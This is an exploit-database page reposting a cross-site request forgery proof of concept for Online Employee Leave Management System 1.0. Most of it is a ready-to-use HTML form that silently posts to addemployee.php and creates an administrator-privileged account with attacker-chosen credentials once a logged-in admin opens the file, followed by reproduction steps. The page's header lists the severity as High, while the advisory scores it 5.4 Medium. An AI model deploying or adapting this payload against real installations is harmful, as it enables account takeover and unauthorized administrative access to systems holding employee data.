Advertisement






Online Employee Leave Management System 1.0 Cross Site Request Forgery

CVE Category Price Severity
CVE-XXXX-XXXX CWE-352 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-09-06
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022090007

Below is a copy:

Online Employee Leave Management System 1.0 Cross Site Request Forgery
# Exploit Title: Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)
# Date: 05/09/2022
# Exploit Author: Amolo Hunters
# Software Link: https://www.sourcecodester.com/php/15374/online-employee-leave-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Linux

Title:
================
Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)

Summary:
================
The Online Employee Leave Management System suffers from a vulnerability called Cross-Site Request Forgery that affects the addemployee.php application used to add employees with administrative privileges. By failing to block against this attack, malicious users can take advantage of this weakness to spoof a request leading to the creation of a new account with administrative privileges.

Severity Level:
================
5.4 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Affected Product:
================
Online Employee Leave Management System v1.0

Steps to Reproduce:
================

1. Create an HTML file and paste the following code:

<html>
<title>Online Employee Leave Management System (addemployee.php) CSRF PoC</title>
<center>
<h1>Online Employee Leave Management System (addemployee.php) CSRF PoC</h1>
<p>by Amolo Hunters</p>
<form action="http://target.com/elms/admin/addemployee.php" method="POST">
<input type="hidden" name="empcode" value="1337" />
<input type="hidden" name="firstName" value="AmoloHT" />
<input type="hidden" name="lastName" value="PoC" />
<input type="hidden" name="email" value="amoloht@poc.com" />
<input type="hidden" name="password" value="hacker123" />
<input type="hidden" name="confirmpassword" value="hacker123" />
<input type="hidden" name="gender" value="Other" />
<input type="hidden" name="dob" value="3 June, 2022" />
<input type="hidden" name="department" value="Information Technology" />
<input type="hidden" name="country" value="Brazil" />
<input type="hidden" name="city" value="PoC" />
<input type="hidden" name="address" value="PoC" />
<input type="hidden" name="mobileno" value="0000000000" />
<input type="hidden" name="add" value="" />
<input type="submit" value="Submit request" />
</form>
</center>
</html>

2. Save the file and run it in the browser
Note: you need to be logged in as an administrator

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.